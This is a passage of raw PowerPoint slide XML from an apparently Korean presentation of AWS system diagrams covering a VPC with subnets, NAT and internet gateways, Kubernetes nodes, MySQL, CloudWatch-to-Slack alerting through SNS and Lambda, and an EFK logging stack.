          <p:cNvPr id="20" name="Graphic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3456" y="5155227"/>
            <a:ext cx="286251" cy="283881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic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1201" y="3122600"/>
            <a:ext cx="283588" cy="283588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 6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66131" y="5527047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16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1434548" y="5905763"/>
            <a:ext cx="1378205" cy="259717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Kubernetes nodes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1391260" y="5478411"/>
            <a:ext cx="9533578" cy="715602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="D86613">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440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D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Auto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86613"/>
                </a:solidFill>
                <a:latin typeface="Arial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>
                <a:solidFill>
                  <a:srgbClr val="D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scaling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86613"/>
                </a:solidFill>
                <a:latin typeface="Arial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>
                <a:solidFill>
                  <a:srgbClr val="D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Graphic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85083" y="5466800"/>
            <a:ext cx="282664" cy="278847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1847254" y="4875393"/>
            <a:ext cx="564100" cy="227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27" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="1847252" y="4868252"/>
            <a:ext cx="564100" cy="2266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sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9463090" y="4065991"/>
            <a:ext cx="1493838" cy="4183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MySQL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instance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Graphic 53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61883" y="36087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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484843" y="2582580"/>
            <a:ext cx="11338118" cy="4014889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="1E8900">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="502920" tIns="9144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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="1E8900"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VPC</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="1E8900"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Graphic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2122" y="2582405"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273675" y="4143375"/>
            <a:ext cx="1644650" cy="2647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vl="0"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Router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 31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867400" y="3686175"/>
            <a:ext cx="45720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4708207" y="2642129"/>
          <a:ext cx="2775585" cy="960120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/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6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50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500"/>
                        <a:t>타겟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10.0.0.0/16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1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BC-IGW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4708207" y="4397904"/>
          <a:ext cx="2775585" cy="960120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/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6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50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500"/>
                        <a:t>타겟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10.0.0.0/16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1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500"/>
                        <a:t>NAT-GW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Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3027261" y="3914775"/>
            <a:ext cx="522702" cy="1846005"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX1" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX2" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY2" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX3" fmla="*/ 482600 w 622300"/>
              <a:gd name="connsiteY3" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY4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00" h="1574800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622300" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574800"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng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0" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3557288" y="4010025"/>
            <a:ext cx="2093010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w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10816458">
            <a:off x="8751785" y="3916015"/>
            <a:ext cx="522702" cy="1846005"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX1" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX2" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY2" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX3" fmla="*/ 482600 w 622300"/>
              <a:gd name="connsiteY3" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY4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00" h="1574800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622300" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574800"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="44546A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2" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6551538" y="4009197"/>
            <a:ext cx="2203911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w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539994" y="3007945"/>
            <a:ext cx="1165086" cy="6382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Public Subnet Route Table</a:t>
            </a:r>
            <a:b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</a:b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(bc-exrt)</a:t>
            </a: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>
          <a:xfrm>
            <a:off x="3549519" y="4550995"/>
            <a:ext cx="1241286" cy="6382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Private Subnet Route Table</a:t>
            </a:r>
            <a:b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</a:b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(bc-inrt)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8010942" y="3525302"/>
            <a:ext cx="948470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w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Graphic 10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260320" y="233462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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7785409" y="2766425"/>
            <a:ext cx="1403350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Internet gateway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974292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l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1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 Private Subnet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 인터넷과 통신하기 위한 아웃바운드 인스턴스</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1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 Private Subnet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은 외부에서 요청하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="13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인바운드는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차단하더라도 아웃바운드 트래픽 허용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1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Private Subnet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외부로 요청하는 아웃바운드 트래픽을 받아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Internet Gateway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와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BDFEB-2DB6-2D2E-CCFC-1BD1E4AA283F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132CB-85EB-3DF7-776C-7D2C04227BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="2727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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12520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16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" name="Google Shape;367;p16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9" name="Google Shape;369;p16" descr="쿠버네티스 진입, 첫발은 '개발자 경험'부터 - 지디넷코리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72" y="1405209"/>
            <a:ext cx="2833784" cy="159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075" y="948000"/>
            <a:ext cx="3836450" cy="38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400" y="948000"/>
            <a:ext cx="4820437" cy="38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425844" y="2799022"/>
            <a:ext cx="782749" cy="7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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908400" y="3622650"/>
            <a:ext cx="1617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배포</a:t>
            </a:r>
            <a:endParaRPr sz="2500" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="374" name="Google Shape;37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2075" y="941663"/>
            <a:ext cx="3836450" cy="5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400" y="948000"/>
            <a:ext cx="4820425" cy="56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B3733-53F6-AA15-78BC-9261EECF1DDD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8D24C-136A-568A-4865-84AB8EE74AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716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쿠버네티스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배포파일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ko-KR" altLang="en-US"/>
              <a:t>클라우드 워치 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 슬랙 시스템 구성도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813810" y="1967490"/>
            <a:ext cx="10564379" cy="2108054"/>
            <a:chOff x="813810" y="1967490"/>
            <a:chExt cx="10564379" cy="2108054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Graphic 9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702811" y="260032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32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="813810" y="1967490"/>
              <a:ext cx="10564379" cy="21080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lvl="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24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1354282" y="3356913"/>
              <a:ext cx="1375207" cy="29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 eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:latin typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                </a:rPr>
                <a:t>Resources</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2642323" y="3009756"/>
              <a:ext cx="957206" cy="0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4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2447925" y="2608767"/>
              <a:ext cx="1375207" cy="297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cs typeface="Arial"/>
                </a:rPr>
                <a:t>리소스 전달</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Graphic 17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12074" y="2600377"/>
              <a:ext cx="706694" cy="706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9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3649935" y="3374250"/>
              <a:ext cx="1051532" cy="2719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en-US" sz="12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CloudWatch</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5596546" y="3380104"/>
              <a:ext cx="1306433" cy="2711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en-US" sz="12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Amazon SNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4712951" y="2984885"/>
              <a:ext cx="95720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545B64">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
              <a:headEnd w="med" len="sm"/>
              <a:tailEnd type="arrow" w="med" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4518553" y="2583896"/>
              <a:ext cx="1375207" cy="300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cs typeface="Arial"/>
                </a:rPr>
                <a:t>결과값 전달</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Graphic 7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874722" y="2607397"/>
              <a:ext cx="704890" cy="704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1"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7749726" y="3384299"/>
              <a:ext cx="958884" cy="271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en-US" sz="12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cs typeface="Arial"/>
                </a:rPr>
                <a:t>Lambda</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Arrow Connector 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6780378" y="2994410"/>
              <a:ext cx="95720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545B64">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
              <a:headEnd w="med" len="sm"/>
              <a:tailEnd type="arrow" w="med" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6585979" y="2593421"/>
              <a:ext cx="1375207" cy="300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cs typeface="Arial"/>
                </a:rPr>
                <a:t>트리거 작동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889256" y="2603498"/>
              <a:ext cx="717777" cy="717777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8777454" y="2981710"/>
              <a:ext cx="95720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545B64">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
              <a:headEnd w="med" len="sm"/>
              <a:tailEnd type="arrow" w="med" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8583054" y="2580721"/>
              <a:ext cx="1375207" cy="297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cs typeface="Arial"/>
                </a:rPr>
                <a:t>메세지 전달</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Graphic 7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9026742" y="3065486"/>
              <a:ext cx="448716" cy="448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9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8618101" y="3512749"/>
              <a:ext cx="13401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AWS KMS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를</a:t>
              </a:r>
              <a:endPara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mazon Ember"/>
                <a:cs typeface="Arial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이용한 암호화</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9796027" y="3381304"/>
              <a:ext cx="965832" cy="26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Slack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Graphic 24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883958" y="2603644"/>
              <a:ext cx="709926" cy="7099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64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39216f502_6_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클라우드 워치 - 슬랙 시스템</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="408" name="Google Shape;408;g1839216f502_6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13" y="1426975"/>
            <a:ext cx="9676375" cy="52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/>
              <a:t>EFK Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 시스템 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813810" y="2219538"/>
            <a:ext cx="10564379" cy="2917679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Pretendard"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1447713" y="2294210"/>
            <a:ext cx="1023913" cy="657659"/>
            <a:chOff x="5625233" y="3348677"/>
            <a:chExt cx="1115568" cy="716529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Graphic 60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16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5625231" y="3803594"/>
              <a:ext cx="1115569" cy="2852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3635" y="3104504"/>
            <a:ext cx="1077829" cy="96112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2267" y="3017493"/>
            <a:ext cx="2327469" cy="12113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92829" y="3165618"/>
            <a:ext cx="1048443" cy="1048443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1450239" y="3361010"/>
            <a:ext cx="1023913" cy="657659"/>
            <a:chOff x="5625233" y="3348677"/>
            <a:chExt cx="1115568" cy="716529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Graphic 60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TextBox 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5625226" y="3803594"/>
              <a:ext cx="1115571" cy="2852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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1451752" y="4418285"/>
            <a:ext cx="1023913" cy="657659"/>
            <a:chOff x="5625233" y="3348677"/>
            <a:chExt cx="1115568" cy="716529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="Graphic 60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6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5625233" y="3803594"/>
              <a:ext cx="1115568" cy="2852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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166437" y="2504028"/>
            <a:ext cx="1627198" cy="1081036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8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2168963" y="3570828"/>
            <a:ext cx="1624672" cy="14236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8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="47" idx="3"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2170475" y="3585065"/>
            <a:ext cx="1623160" cy="1043039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8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="37" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871466" y="3585065"/>
            <a:ext cx="1177290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8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7621308" y="3568816"/>
            <a:ext cx="1393846" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="545B64"/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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117310" y="3109549"/>
            <a:ext cx="1003298" cy="2708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mazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>로그스트림</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3827728" y="4214449"/>
            <a:ext cx="1003298" cy="2708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mazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>로그 수집</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283818" y="4200842"/>
            <a:ext cx="1003298" cy="2708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mazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>로그 저장소</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
